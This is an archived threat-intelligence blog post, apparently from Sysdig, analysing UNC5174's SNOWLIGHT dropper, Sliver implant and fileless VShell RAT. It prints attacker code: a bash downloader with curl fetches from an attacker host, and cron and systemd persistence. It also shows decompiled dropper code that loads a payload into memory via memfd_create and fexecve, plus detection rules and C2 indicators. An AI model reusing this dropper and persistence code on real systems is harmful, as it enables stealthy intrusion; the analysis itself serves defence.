{
	"id": "8d36d151-5d2e-4bdb-8e1d-75f6360f85dd",
	"created_at": "2026-04-06T01:29:06.903492Z",
	"updated_at": "2026-04-10T03:34:27.971713Z",
	"deleted_at": null,
	"sha1_hash": "4f8f9491935097347510437ef3e902047de95b01",
	"title": "UNC5174’s evolution in China’s ongoing cyber warfare: From SNOWLIGHT to VShell",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1301319,
	"plain_text": "UNC5174’s evolution in China’s ongoing cyber warfare: From\r\nSNOWLIGHT to VShell\r\nBy Alessandra Rizzo\r\nPublished: 2025-04-15 · Archived: 2026-04-06 01:22:07 UTC\r\nhttps://sysdig.com/blog/unc5174-chinese-threat-actor-vshell/\r\nPage 1 of 23\n\nAfter a year of operating under the radar, the Sysdig Threat Research Team (TRT) identified a new campaign from\r\nChinese state-sponsored threat actor UNC5174. We found that the threat actor was using a new open source tool\r\nand command and control (C2) infrastructure in late January 2025. We first discovered a malicious bash script\r\nresponsible for downloading multiple executable files for persistence. One of the binaries downloaded is a variant\r\nof UNC5174’s SNOWLIGHT malware, previously identified by Mandiant in a campaign against F5 devices and\r\nrecently mentioned in the French Cyber Threat Overview report released in March 2025 by the French National\r\nAgency for Information Systems Security (ANSSI).\r\nPreviously known for using the open source reverse shell tool SUPERSHELL, UNC5174 has adopted a newly\r\nreleased open source tool called VShell in this campaign. According to its reputation on underground channels,\r\nVShell is considered “even better” than the widely known Cobalt Strike framework. In the 2024 Global Threat\r\nYear-in-Review, we reported that threat actors are increasingly using open source tools in their arsenals for cost-effectiveness and obfuscation and, in this case, plausibly to blend in with the pool of non-state-sponsored and often less technical adversaries (e.g., script kiddies), thereby making attribution even more\r\ndifficult. 
This seems to hold especially true for this particular threat actor, who has been under the radar for the\r\nlast year since being affiliated with the Chinese government. \r\nThe SNOWLIGHT malware acts as a dropper for a fileless payload that resides solely in memory, called VShell.\r\nVShell is a Remote Access Trojan (RAT) popular among Chinese-speaking cybercriminals in several forums, and\r\nits main developer is also a Chinese speaker. \r\nVShell is not included in a malware dropper by default and is not directly linked to the SNOWLIGHT malware.\r\nThe use of fileless payloads via this specific delivery method has only been attributed to UNC5174. Nearly all of\r\nthis threat actor’s tools are customized and therefore not easily copied by others. The sophistication of the\r\ntechniques we analyzed also aligns with their highly technical capabilities. Based on our analysis and experience\r\nwith this threat actor, we believe that UNC5174’s motivations are espionage and/or selling and brokering access to\r\nthe victims’ environments post-exploitation.\r\nSNOWLIGHT and VShell pose a significant risk to organizations due to their stealthy and sophisticated\r\ntechniques. This is evidenced by the employment of WebSockets for command and control, as well as the fileless\r\nVShell payload we have found. We assess with moderate confidence that this threat actor will continue to provide\r\noccasional support to the Chinese government in the future, using an expanding arsenal of custom and open\r\nsource tools and extensive C2 infrastructure for espionage and access brokering. \r\nSysdig customers and Falco users are protected from the deployment of VShell. The analysis below offers a\r\ntechnical deep dive into our observations.\r\nUNC5174 background\r\nThe threat actor UNC5174 is believed to be a contractor working on behalf of the Chinese government. 
According\r\nto HivePro and Mandiant, UNC5174 targets Western countries, such as the United States, Canada, and the United\r\nKingdom. The victims in these countries are often research institutions, government organizations, think tanks,\r\nand technology companies. UNC5174 also targets various non-governmental organizations (NGOs) in the Asia-Pacific region and, in some cases, has also targeted businesses within the critical infrastructure sectors of energy,\r\ndefense, and healthcare. \r\nAccording to the 2024 French Cyber Threat Overview report, released in March 2025 by ANSSI, UNC5174\r\nexploited Ivanti’s Cloud Service Appliance (CSA) products during the 2024 Summer Olympics. According to\r\nSOCRadar, this threat actor also leveraged phishing with malicious email attachments to deliver their malware in\r\n2019. We also found evidence that SNOWLIGHT malware is actively targeting macOS systems, as reported by\r\nObjective-See in their 2024 Malware Recap Report. \r\nAlthough it is unclear what UNC5174 is using for initial access in this campaign, it is targeting Linux-based\r\nsystems. We assess with high confidence that the new infrastructure aligns with domain squatting, likely employed\r\nfor phishing and social engineering. The domains are predominantly impersonating known companies, with the\r\nmost recent instance spoofing Cloudflare. Other recent domains impersonated the messaging app Telegram, the\r\nfinancial service company Huione Pay, and Google.\r\nPrevious campaigns\r\nWhile looking at VirusTotal (VT) tags for the SNOWLIGHT sample, we found that the first sample dropping a\r\nVShell binary in the same fashion we observed with our newest binary was first detected in November 2024.\r\nSince then, several droppers have been detected, with one of the latest being the dnsloger sample we found for\r\nthis campaign. 
It is reasonable to assume that this campaign has continued to operate without much public\r\nattention since November 2024.\r\nSNOWLIGHT malware, when executing and downloading in memory, uses the name “[kworker/0:2].” We found\r\nseveral binaries that we believe are associated with a previously unreported UNC5174 campaign while looking for\r\nassociated VShell hashes on VT, using this query:\r\nbehaviour_processes:\"/memfd:a (deleted)/ [kworker/0:2]\"\r\nThis led to the discovery of additional UNC5174 C2 infrastructure from November 2024: googlespays[.]com. The\r\nGoogle brand impersonation matches the pattern of the current C2 domain and includes the parameters needed to\r\nretrieve the VShell binaries.\r\nThe November 2024 VShell binary also uses a WebSocket protocol over the C2 domain apib[.]googlespays[.]com,\r\nthe same attack chain and distinguishable features that we observed with the newest samples and domains.\r\nUNC5174’s new campaign\r\nFollowing initial access, a malicious bash script drops two payloads: dnsloger (associated with SNOWLIGHT\r\nmalware) and system_worker (associated with Sliver and Cobalt Strike).\r\nThis step’s main focus is establishing persistence by dropping a Sliver implant and an in-memory backdoor\r\n(VShell) for further exploitation. \r\nDomain analysis\r\nIn this campaign, we observed new C2 domains:\r\ngooogleasia[.]com (with no affiliation to Google)\r\nsex666vr[.]com\r\nThese domains have multiple subdomains, some of which have other brand names, such as\r\nlogin[.]microsoftonline[.]gooogleasia[.]com . Domain squatting was likely used for phishing purposes. \r\nWe confidently assess that this campaign is still active at the time of publishing, as new domains listed in the IoCs\r\nsection have been detected as of late March 2025, exhibiting the same modus operandi as detailed below. 
These\r\ninclude: \r\ntelegrams[.]icu (plausibly impersonating Telegram)\r\nhuionepay[.]me (plausibly impersonating Huione Pay)\r\nc1oudf1are[.]com (plausibly impersonating Cloudflare)\r\nGooogleasia[.]com\r\nThe domain gooogleasia[.]com was created on Sept. 1, 2023, and as of Jan. 16, 2025, it resolved to the IP\r\naddress 34[.]96[.]239[.]183. We resolved this to an IP host name located in Hong Kong for a Google Compute\r\nEngine (GCE) virtual machine. GCE is a computing and hosting service that lets users create and run virtual\r\nmachines on Google infrastructure. During the investigation, we’ve noticed that a new IP started to host\r\ngooogleasia[.]com and its subdomains: 34[.]96[.]252[.]230, changed on February 21, 2025.\r\nWe identified several subdomains used between December 2024 and January 2025 with the most recent,\r\nvs[.]gooogleasia[.]com , using the same IP address.\r\nMalTrail also classifies several subdomains of gooogleasia[.]com as Cobalt Strike C2s.\r\nevil[.]gooogleasia[.]com\r\naccount[.]gooogleasia[.]com\r\nks[.]evil[.]gooogleasia[.]com\r\nbtt[.]evil[.]gooogleasia[.]com\r\nVT community content users identified multiple Sliver C2 servers on the same IP on ports 8888 and 443, which\r\nalso coincides with the use of the system_worker payload, a Sliver implant we found.\r\nSex666vr[.]com\r\nWith regards to the other C2 domain used in this campaign, sex666vr[.]com , it resolves to the IP address\r\n34[.]91[.]68[.]192. We believe that UNC5174 is no longer using this IP for this campaign, as it was last seen in\r\nOctober 2024.\r\nTechnical analysis\r\ndownload_backd.sh\r\nSHA256 Hash: c0838b1211d482d21ccb2c9cc9fb224d1f826474d496a76d21ca18fa2ef92bc1\r\nThis is the original bash script responsible for downloading and executing the dnsloger and system_worker\r\nbinaries. 
The shell script contains various functions to verify if the malicious executables dropped correspond to\r\nthe expected MD5 hashes. If they do not, the script attempts to re-download them.\r\n# 2. If the check fails, re-download and redeploy\r\necho \"Downloading $executable...\"\r\ncurl -sL \"http://gooogleasia.com:8080/download_$executable\" -o \"/tmp/$executable\"\r\nchmod +x /tmp/$executable\r\nThe script also checks if it’s running as root ( id -u = 0 ). If it is not, it keeps the downloaded executable in\r\n/tmp . When running as root, the script moves the executable to /usr/bin/ , making it more persistent,\r\npotentially harder to remove and plausibly to blend in with other legitimate binaries, as well as making them\r\naccessible system-wide.\r\nif [ \"$(id -u)\" = \"0\" ]\r\necho \"Running as non-root user, keeping them in /tmp\"\r\n# Set the file timestamp to match the target folder\r\ntouch --reference=/usr/bin /tmp/$executable\r\nFor persistence, the script abuses crontab by adding the executables to ensure they run every hour and after\r\nreboots, finally starting them in the background.\r\n# Add the programs to crontab for execution at reboot and every hour\r\necho \"Adding programs to crontab...\"\r\n(crontab -l 2\u003e/dev/null\r\necho \"@reboot /usr/bin/$executable1\"\r\necho \"@reboot /usr/bin/$executable2\"\r\necho \"0 * * * * /tmp/$executable1\"\r\necho \"0 * * * * /tmp/$executable2\")\r\nThe script configures two malicious binaries, dnsloger and system_worker , to run at startup via systemd\r\n(newer systems) or init.d (older systems). Systemctl is used to reload the systemd configuration and finally\r\nstart the malicious services. 
For systems using init.d , the script uses chkconfig to ensure the service starts on\r\nboot.\r\ncat \u003c\u003cEOF \u003e /etc/systemd/system/$executable.service\r\n[Unit]\r\nDescription=$executable Application Service\r\nAfter=network.target\r\n[Service]\r\nType=simple\r\nExecStart=/usr/bin/$executable\r\nRestart=always\r\nRestartSec=3600\r\n[Install]\r\nWantedBy=multi-user.target\r\nEOF\r\necho \"Setting up systemd service for $executable...\"\r\nretry_with_timeout \"systemctl daemon-reload\"\r\nretry_with_timeout \"systemctl enable $executable.service\"\r\nretry_with_timeout \"systemctl start $executable.service\"\r\nSNOWLIGHT\r\nPayload name: dnsloger\r\nSHA256: e6db3de3a21debce119b16697ea2de5376f685567b284ef2dee32feb8d2d44f8\r\nThe downloaded executable, dnsloger , is detected on VT as part of the SNOWLIGHT malware family used by\r\nUNC5174, as previously reported by HivePro. The malware performs several actions that show a more in-depth\r\nknowledge of Linux internals, persistence, defense evasion, and injection techniques.\r\nAnalyzing the malware with radare2, a free reverse engineering tool, reveals that some parameters and filenames\r\nare hardcoded. For instance, the user-agent, set to User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:48.0)\r\nGecko/20100101 Firefox/48.0, and the C2 server, vs[.]gooogleasia[.]com.\r\nSNOWLIGHT Extracted Strings\r\nDecompiling the binary with Ghidra results in the following C code:\r\n{\r\n int iVar1;\r\n in_addr_t iVar2;\r\n int iVar3;\r\n int iVar4;\r\n hostent *phVar5;\r\n ssize_t sVar6;\r\n byte *pbVar7;\r\n long lVar8;\r\n char *pcVar9;\r\n ushort uVar10;\r\n bool bVar11;\r\n byte bVar12;\r\n undefined4 local_1c4c;\r\n char *local_1c48;\r\n undefined8 local_1c40;\r\n sockaddr local_1c38;\r\n char local_1c28 [1024];\r\n char local_1828 [1024];\r\n char local_1428 [1024];\r\n byte local_1028 [4104];\r\n bVar12 = 0;\r\n iVar1 = access(\"/tmp/log_de.log\",0);\r\n if (iVar1 != 0) {\r\n local_1c38.sa_data[6] = '\\0';\r\n local_1c38.sa_data[7] = '\\0';\r\n local_1c38.sa_data[8] = '\\0';\r\n local_1c38.sa_data[9] = '\\0';\r\n local_1c38.sa_data[10] = '\\0';\r\n local_1c38.sa_data[0xb] = '\\0';\r\n local_1c38.sa_data[0xc] = '\\0';\r\n local_1c38.sa_data[0xd] = '\\0';\r\n local_1c38.sa_family = 2;\r\n local_1c38.sa_data[0] = ' ';\r\n local_1c38.sa_data[1] = -5;\r\n local_1c38.sa_data[2] = '\\0';\r\n local_1c38.sa_data[3] = '\\0';\r\n local_1c38.sa_data[4] = '\\0';\r\n local_1c38.sa_data[5] = '\\0';\r\n phVar5 = gethostbyname(\"vs.gooogleasia.com\");\r\n if (phVar5 == (hostent *)0x0) {\r\n iVar2 = inet_addr(\"vs.gooogleasia.com\");\r\n }\r\n else {\r\n iVar2 = *(in_addr_t *)*phVar5-\u003eh_addr_list;\r\n }\r\n local_1c38.sa_data._2_4_ = iVar2;\r\n iVar1 = socket(2,1,0);\r\n if (-1 \u003c iVar1) {\r\n local_1c4c = 10;\r\n setsockopt(iVar1,6,7,\u0026local_1c4c,4);\r\n while (iVar3 = connect(iVar1,\u0026local_1c38,0x10), iVar3 == -1) {\r\n sleep(10);\r\n }\r\n uVar10 = (ushort)local_1c38.sa_data._0_2_ \u003e\u003e 8 | local_1c38.sa_data._0_2_ \u003c\u003c 8;\r\n sprintf(local_1c28,\r\n \"GET /?a=%s\u0026h=%s\u0026t=%s\u0026p=%d HTTP/1.1\\r\\nHost: %s:%d\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv\r\n ,\"l64\",\"vs.gooogleasia.com\",\"ws_\",(uint)uVar10,\"vs.gooogleasia.com\",(uint)uVar10);\r\n send(iVar1,local_1c28,0x400,0);\r\n pcVar9 = local_1c28;\r\n for (lVar8 = 0x100; lVar8 != 0; lVar8 = lVar8 + -1) {\r\n pcVar9[0] = '\\0';\r\n pcVar9[1] = '\\0';\r\n pcVar9[2] = '\\0';\r\n pcVar9[3] = '\\0';\r\n pcVar9 = pcVar9 + (ulong)bVar12 * -8 + 4;\r\n }\r\n iVar3 = 0;\r\n while( true ) {\r\n sVar6 = recv(iVar1,local_1828,1,0);\r\n if (((int)sVar6 \u003c 1) ||\r\n ((((bVar11 = local_1828[0] == '\\n', local_1828[iVar3] = local_1828[0], bVar11 \u0026\u0026\r\n (local_1828[iVar3 + -1] == '\\r')) \u0026\u0026 (local_1828[iVar3 + -2] == '\\n')) \u0026\u0026\r\n (local_1828[iVar3 + -3] == '\\r')))) break;\r\n iVar3 = iVar3 + (int)sVar6;\r\n }\r\n lVar8 = syscall(0x13f,\u0026DAT_00400e50,1); // Sysdig: memfd_create\r\n iVar3 = (int)lVar8;\r\n if (-1 \u003c iVar3) {\r\n while( true ) {\r\n sVar6 = recv(iVar1,local_1028,0x1000,0);\r\n iVar4 = (int)sVar6;\r\n pbVar7 = local_1028;\r\n if (iVar4 \u003c 1) break;\r\n do {\r\n *pbVar7 = *pbVar7 ^ 0x99;\r\n pbVar7 = pbVar7 + 1;\r\n } while ((int)pbVar7 - (int)local_1028 \u003c iVar4);\r\n write(iVar3,local_1028,(long)iVar4);\r\n }\r\n for (lVar8 = 0x400; lVar8 != 0; lVar8 = lVar8 + -1) {\r\n pbVar7[0] = 0;\r\n pbVar7[1] = 0;\r\n pbVar7[2] = 0;\r\n pbVar7[3] = 0;\r\n pbVar7 = pbVar7 + (ulong)bVar12 * -8 + 4;\r\n }\r\n close(iVar1);\r\n realpath((char *)*param_2,local_1428);\r\n setenv(\"CWD\",local_1428,1);\r\n local_1c48 = \"[kworker/0:2]\";\r\n local_1c40 = 0;\r\n fexecve(iVar3,\u0026local_1c48,environ);\r\n close(iVar1);\r\n }\r\n }\r\n return 0;\r\n }\r\n /* WARNING: Subroutine does not return */\r\n exit(0);\r\n}\r\nThe code first checks for the presence of a log file ( /tmp/log_de.log ). If it doesn’t exist, it proceeds to set up a\r\nsocket for network communication, aiming to connect to a remote server. It then attempts to resolve and connect\r\nto vs[.]gooogleasia[.]com , sending an HTTP GET request with specific query parameters and the\r\nhardcoded user agent. \r\nSNOWLIGHT malware attempts to receive data over the network through the recvfrom syscall, which is a\r\nsystem call that reads data from a socket, typically for UDP or TCP communication. It is commonly used by\r\napplications that need to receive messages over a network, like network servers or clients. In the context of this\r\nattack chain, the recvfrom syscall may be set up in order to receive further payloads or communication with the\r\nC2 server.\r\nThe malware then waits to receive data from the server and XORs the data with 0x99, suggesting an attempt to\r\nobfuscate or encrypt the content before processing it. Finally, it uses system functions to manipulate environment\r\nvariables, such as setting the current working directory to the environment variable “CWD.”\r\nSliver\r\nPayload name: system_worker\r\nSHA256: 21ccb25887eae8b17349cefc04394dc3ad75c289768d7ba61f51d228b4c964db\r\nThe downloaded executable system_worker was categorized as Sliver malware on VT as of Jan. 19, 2025. It is\r\nboth UPX-packed and obfuscated with gobfuscate. We deobfuscated it using the “ degobfuscate.py ” plugin for\r\nGhidra, available on GitHub, and confirmed the unpacked binaries’ functions were the same as those found in the\r\nSliver Go package.\r\nDeobfuscated strings\r\nSliver functions\r\nA Sliver implant is a piece of malware used in C2 operations to give an attacker remote control over a\r\ncompromised system. 
Once deployed on a target machine, the implant serves as the attacker’s foothold, allowing\r\nthem to execute malicious actions, gather information, and/or control the infected system remotely.\r\nAnalyzing the runtime behavior of system_worker logs showed that this binary reaches out to multiple C2\r\nsubdomains hosted at sex666vr[.]com , as shown below:\r\n2595 16:18:10.087506663 1 vt_21ccb25887ea (12080.12080) \u003c read res=62 data=.*...........mtls.sex666vr.com.....\r\n10051 16:19:10.356965588 1 vt_21ccb25887ea (12080.12090) \u003c read res=112 data=.P...........wg.gooogleasia.com....\r\n34257 16:22:17.391257404 1 vt_21ccb25887ea (12080.12099) \u003c write res=47 data=A............https.sex666vr.com....\r\nMore specifically, the binary uses secure communication channels typical of Sliver implants, including mutual\r\nTLS (mTLS), WireGuard, and HTTPS. These protocols can be seen in the subdomains mentioned. \r\nVShell\r\nName: Fileless (memfd)\r\nSHA256: 8d88944149ea1477bd7ba0a07be3a4371ba958d4a47b783f7c10cbe08c5e7d38\r\nThe dnsloger (SNOWLIGHT) binary downloads the VShell binary through a carefully crafted GET request to\r\nthe C2 server. This is visible from the sendto syscall log below:\r\n2011 16:09:00.720663842 1 vt_e6db3de3a21d (12202.12202) \u003c sendto res=1024 data=GET /?a=l64\u0026h=vs.gooogleasia.com\r\nVShell is a backdoor used to remotely access and control compromised systems. This binary became available in\r\n2024 on GitHub, published by the user “veo” in the “vshell” repository. It is created through the memfd_create\r\n(syscall 0x13f) by its dropper, SNOWLIGHT, in this campaign. This is a hallmark of fileless malware, where the\r\nmalicious code resides entirely in memory and doesn’t touch the disk, making detection via traditional file-based\r\nscanning methods difficult. 
\r\n2377 16:09:00.923728239 1 vt_e6db3de3a21d (12202.12202) \u003c memfd_create fd=4(\u003cm\u003ea) name=a flags=1(MFD_CLOEXEC)\r\nIt is disguised as a system process ([ kworker/0:2 ]) and executed through the fexecve syscall, as shown in the\r\ndecompiled code of the SNOWLIGHT section above. This syscall allows the execution of a binary that has been\r\nopened as a file descriptor. Instead of supplying a file path, providing an open file descriptor to fexecve() will\r\nexecute the program from memory. It also passes down all environment variables accessible to the current process.\r\nfexecve(iVar3, \u0026local_1c48, environ);\r\nThe binary is obfuscated with Gobfuscate, and has the typical .exe name associated with a fileless binary,\r\nprefixed by “ memfd .” At its creation, the filename chosen is “ a ” and later changed to “ kworker ” to blend in\r\nwith legitimate kernel processes.\r\nBackground\r\nAccording to this article, the original developer of VShell decided to completely delete the release for legal\r\nreasons, but it is still circulating on the Internet. Additionally, because the license has expired, it is technically no\r\nlonger legally usable. Nevertheless, the article links to a way of configuring VShell by bypassing the license\r\nexpiration.\r\nVShell Config File\r\nSearching for the full Chinese VShell title online reveals downloadable zip archives containing the binary from\r\nthird-party file-sharing websites, as seen below:\r\nThird-party link to download VShell client\r\nThere are also, of course, a number of clone repositories on GitHub that still contain VShell and documentation on\r\nhow to use it.\r\nSnapshot of VShell clone GitHub repository\r\nVShell has been misused for malicious activities since its release, primarily for remote access and C2 purposes. 
It\r\nacts as a RAT (Remote Access Trojan), allowing its abusers to execute arbitrary commands and download or\r\nupload files.\r\nAccording to the possible use cases we researched for this malware, the client for VShell is downloadable from\r\nthe C2, according to the targeted system. The payload names available for further download through the VShell\r\nconsole correspond to the ones we were able to retrieve from our research, such as linux_i386 .\r\nVShell Payload Generator\r\nFrom the picture above, it’s possible to see that the various payloads are capable of injecting shellcode and\r\nmalicious binaries for Linux, Windows, and macOS on an infected machine that is connected to the VShell main\r\nconsole. The malware also supports the upload and download of files from the compromised machines.\r\nMemory manipulation\r\nOnce executed, VShell carries out a series of suspicious memory manipulation operations on the system. It\r\nperforms multiple memory mappings (mmap and mmap2 system calls), with fd=-1 (indicating no file\r\ndescriptor) combined with flags like MAP_PRIVATE | MAP_ANONYMOUS . This suggests that the process is allocating\r\nmemory without associating it with any files.\r\nThe process is repeatedly allocating large, seemingly random blocks of memory. Some of these mappings are huge\r\n(e.g., 64MB, 128MB, 512MB) and are allocated with PROT_NONE protection, which means the memory cannot\r\nbe accessed (read/write). This “blank” memory could later be changed to allow executable access ( PROT_EXEC ), a\r\nbehavior commonly seen in fileless malware. 
Given that further payloads can be sent by the attacker’s C2, it’s\r\nreasonable to think that these inaccessible memory regions are mapped in preparation of such additional payloads.\r\nWe found an article on how to compress and reduce the size of the payloads and shellcodes downloaded by VShell\r\nas they can be suspiciously large, reducing them from 20MB to 1 KB shellcode.\r\nCommand and control\r\nThe presence of the Upgrade: websocket and Connection: Upgrade headers in the write data shows that the\r\nprocess is attempting to upgrade from an HTTP connection to a WebSocket connection to the server at\r\nvs[.]gooogleasia[.]com on port 8443. WebSockets provide a two-way communication channel over a single\r\nTCP connection and use less overhead for file uploads and downloads since it is real time.\r\n11949 16:09:03.107155929 1 4 (12202.12202) \u003c write res=163 data=GET /w HTTP/1.1..Host: vs.gooogleasia.com:8443\r\n11963 16:09:03.297903241 1 4 (12202.12202) \u003c read res=129 data=HTTP/1.1 101 Switching Protocols..Upgrade: websoc\r\n12437 16:09:04.387602087 1 4 (12202.12213) \u003c write res=163 data=GET /w HTTP/1.1..Host: vs.gooogleasia.com:8443..\r\n12515 16:09:04.576754849 1 4 (12202.12213) \u003c read res=129 data=HTTP/1.1 101 Switching Protocols..Upgrade: websoc\r\n12871 16:09:05.345517369 1 4 (12202.12213) \u003c write res=163 data=GET /w HTTP/1.1..Host: vs.gooogleasia.com:8443..\r\n12939 16:09:05.536259167 0 4 (12202.12202) \u003c read res=129 data=HTTP/1.1 101 Switching Protocols..Upgrade: websoc\r\nThe choice of WebSockets for C2 is not new, but it is not a typical choice for malware either. Over the years, there\r\nhave been a few reports documenting malware that uses WebSockets for C2 communications, such as\r\nPY#RATION. WebSocket C2s are more tedious for attackers to configure compared with standard methods, and\r\nthey typically run on port 80 or 443. 
\r\nIn this case, the attackers have configured VShell to run on the HTTPS port (8443). This is significant because\r\nHTTPS traffic is encrypted. Our runtime capture confirms that, except for a few random words, we found nothing\r\nof note in the network traffic once the connection was upgraded to a WebSocket. \r\nGiven that the infected hosts are managed through a UI (as shown below), it is likely that UNC5174 prefers\r\nWebSockets because the payloads can be sent to the compromised machine in real-time and over encrypted traffic.\r\nThere have been a few reports over the years of antivirus solutions missing malware C2 communication over\r\nWebSockets, so it is also possible that the threat actor is trying to use a less common C2 channel for defense\r\nevasion purposes.\r\nVShell Console UI\r\nThe choice of WebSocket does not seem common to all VShell binaries we have analyzed, which encompassed\r\nseveral protocols (TCP and UDP predominantly). To the best of our knowledge, the usage of WebSockets for\r\nVShell is a distinguishing feature of this campaign, as well as its dropper, SNOWLIGHT.\r\nConclusion\r\nThis campaign highlights a new development for the Chinese state-sponsored threat actor UNC5174. As first\r\nreported by Mandiant, SNOWLIGHT is a custom dropper that is used to gain a foothold in the compromised\r\nenvironment for further exploitation, likely involving espionage and reselling access. This new campaign sees the\r\nemployment of VShell, a popular open source Chinese RAT, make its way into the threat actor’s toolset. \r\nSNOWLIGHT and VShell pose a significant risk to organizations as the analyzed techniques and methods\r\nemployed, such as the employment of WebSockets and the usage of a fileless VShell payload, denote a higher\r\nlevel of technical knowledge. 
The lack of public documentation on VShell being employed by this threat actor is\r\ntelling, as the evidence we have gathered shows that this campaign has been active since at least November 2024.\r\nWe assess with moderate confidence that this threat actor will continue to support the Chinese government and\r\nexpand its arsenal with the intent of gaining access to organizations located in countries of interest. UNC5174 will\r\nalso likely continue to employ stealthy techniques to minimize detection and alerting, including the use of fileless\r\npayloads with new tools and quickly changing network infrastructure.\r\nUNC5174’s campaign detection\r\nSysdig customers are protected from the deployment of VShell with the following rules.\r\nFalco users can apply the rules below to detect the VShell threat.\r\nFalco\r\nSysdig Runtime Threat Detection\r\nDetects VShell execution by its parent (SNOWLIGHT).\r\n- rule: Fileless Malware Detected (memfd)\r\n desc: This rule detects the loading and execution of a fileless ELF malware, indicating potential memory-based\r\n condition: spawned_process and proc.is_exe_from_memfd=true and evt.arg.flags contains \"EXE_FROM_MEMFD\" and pro\r\n output: An ELF %proc.exe was loaded and executed in memory on %container.name and parent %proc.pname under us\r\n priority: CRITICAL\r\nSysdig Runtime Threat Detection\r\nDetects VShell preparation stage before downloading further payloads from the C2, in memory.\r\n- rule: Memory Manipulation by Fileless Program\r\n desc: Detects the allocation of large, anonymous unused memory regions (64 MB or more) by a process, where the\r\n condition: (evt.type in (mmap,mmap2) and evt.dir = \u003e and evt.rawarg.length \u003e= 67108864 and evt.arg.flags conta\r\n output: Fileless process %proc.exe allocated a large amount of memory %evt.arg.length on %container.name under\r\n tags: [host, container]\r\n priority: 
CRITICAL\r\nYARA\r\nSysdig customers can also take advantage of the following YARA rule to detect the SNOWLIGHT threat.\r\nrule SNOWLIGHT_DROPPER_SYSDIG\r\n{\r\n meta:\r\n author = \"Alessandra Rizzo\"\r\n description = \"This rule detects strings seen in SNOWLIGHT malware acting as a dropper for filel\r\n md5 = \"96f307b0ba3bb11715fab5db8d61191f\"\r\n platforms = \"Linux\"\r\n malware_family = \"SNOWLIGHT\"\r\n strings:\r\n $http_get_request = { 77 73 5f 00 6c 36 34 00 47 45 54 20 2f 3f 61 3d 25 73 26 68 3d 25 73 26 74\r\n $user_agent = { 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 6f 7a 69 6c 6c 61 2f 35 2e 30 20 28 57 69\r\n $fileless_payload_masked_name = { 5b 6b 77 6f 72 6b 65 72 2f 30 3a 32 }\r\n condition:\r\n uint32(0) == 0x464c457f and all of them\r\n}\r\nIoCs\r\nType | IoC | IoC Note\r\nDomain | vs[.]gooogleasia[.]com | VShell Console\r\nIP Address | 34[.]96[.]239[.]183 | C2 Address\r\nIP Address | 8[.]219[.]171[.]47 | C2 Address\r\nDomain | apib[.]googlespays[.]com | SNOWLIGHT Dropper Domain (November 2024)\r\nIP Address | 188[.]114[.]97[.]3 | C2 Address\r\nURL | http://vs[.]gooogleasia[.]com:8443/?a=l64\u0026h=vs.gooogleasia.com\u0026t=ws_\u0026p=8443 | VShell Payload Downloader\r\nSHA256 | e6db3de3a21debce119b16697ea2de5376f685567b284ef2dee32feb8d2d44f8 | SNOWLIGHT\r\nSHA256 | 8d88944149ea1477bd7ba0a07be3a4371ba958d4a47b783f7c10cbe08c5e7d38 | VShell\r\nSHA256 | 21ccb25887eae8b17349cefc04394dc3ad75c289768d7ba61f51d228b4c964db | Sliver Implant\r\nDomain | sex666vr[.]com | C2 Domain\r\nIP Address | 34[.]55[.]187[.]149 | C2 Address\r\nURL | http://ciscocdn[.]com:8888/supershell/compile/download/x64 | SuperShell Downloader, possibly part of a previous campaign\r\nURL | http://www[.]bing-server[.]com:443 | URL possibly part of a previous campaign\r\nSHA256 | 6579defcd1326efad359c59cfe9a76d7df375e54f6e977dd880d10f81325999e | SNOWLIGHT (November 2024 Campaign)\r\nSHA256 | f064fdd24c56f2d20f1a6a32fc7edbd3848f962b25965b788b0dc725eeab9db4 | VShell (November 2024 Campaign)\r\nDomain | evil[.]gooogleasia[.]com | Identified subdomain\r\nDomain | account[.]gooogleasia[.]com | Identified subdomain\r\nDomain | ks[.]evil[.]gooogleasia[.]com | Identified subdomain\r\nDomain | btt[.]evil[.]gooogleasia[.]com | Identified subdomain\r\nIP Address | 34[.]150[.]33[.]237 | Hosted gooogleasia[.]com\r\nIP Address | 34[.]96[.]169[.]109 | Hosted gooogleasia[.]com\r\nIP Address | 34[.]92[.]255[.]51 | Hosted gooogleasia[.]com\r\nIP Address | 34[.]131[.]20[.]34 | Hosted gooogleasia[.]com\r\nIP Address | 34[.]131[.]242[.]33 | Hosted gooogleasia[.]com\r\nIP Address | 34[.]126[.]97[.]166 | Hosted gooogleasia[.]com\r\nDomain | mtls[.]sex666vr[.]com | Sliver C2\r\nDomain | wg[.]gooogleasia[.]com | Sliver C2\r\nDomain | https[.]sex666vr[.]com | Sliver C2\r\nDomain | samsungcdn[.]com | Previous C2\r\nURL | http://47[.]97[.]176[.]108:8887/?a=l64\u0026h=47.97.176.108\u0026t=ws_\u0026p=8887 | VShell Downloader\r\nURL | http://images.windowstimes[.]online/?a=l64\u0026h=images.windowstimes[.]online\u0026t=ws_\u0026p=80 | VShell Downloader\r\nDomain | start[.]bootstrapcdn[.]fun | Previous C2\r\nDomain | mcafeecdn[.]xyz | Previous C2\r\nURL | http://124[.]221[.]120[.]25:2222/vs666 | SNOWLIGHT Downloader\r\nDomain | chmobank[.]com | Previous C2\r\nURL | http://lin[.]huionepay[.]me:2086/?a=l64\u0026h=lin.huionepay.me\u0026t=ws_\u0026p=2086 | Ongoing campaign – SNOWLIGHT Downloader\r\nURL | http://lin[.]telegrams[.]icu:2086/?a=l64\u0026h=lin.telegrams.icu\u0026t=ws_\u0026p=2086 | Ongoing campaign – SNOWLIGHT Downloader\r\nURL | http://lin[.]c1oudf1are[.]com:42323/?a=l64\u0026h=lin.c1oudf1are.com\u0026t=ws_\u0026p=42323 | Ongoing campaign – SNOWLIGHT Downloader\r\nSource: https://sysdig.com/blog/unc5174-chinese-threat-actor-vshell/\r\nvs[.]gooogleasia[.]com on port 8443. WebSockets provide a two-way communication channel over a single TCP connection and use less overhead for file uploads and downloads since it is real time.\n11949 16:09:03.107155929  1 4 (12202.12202) \u003c write res=163 data=GET /w HTTP/1.1..Host: vs.gooogleasia.com:8443 \n11963 16:09:03.297903241 1 4 (12202.12202) \u003c read res=129 data=HTTP/1.1 101 Switching Protocols..Upgrade: websoc\n12437 16:09:04.387602087 1 4 (12202.12213) \u003c write res=163 data=GET /w HTTP/1.1..Host: vs.gooogleasia.com:8443.. \n12515 16:09:04.576754849 1 4 (12202.12213) \u003c read res=129 data=HTTP/1.1 101 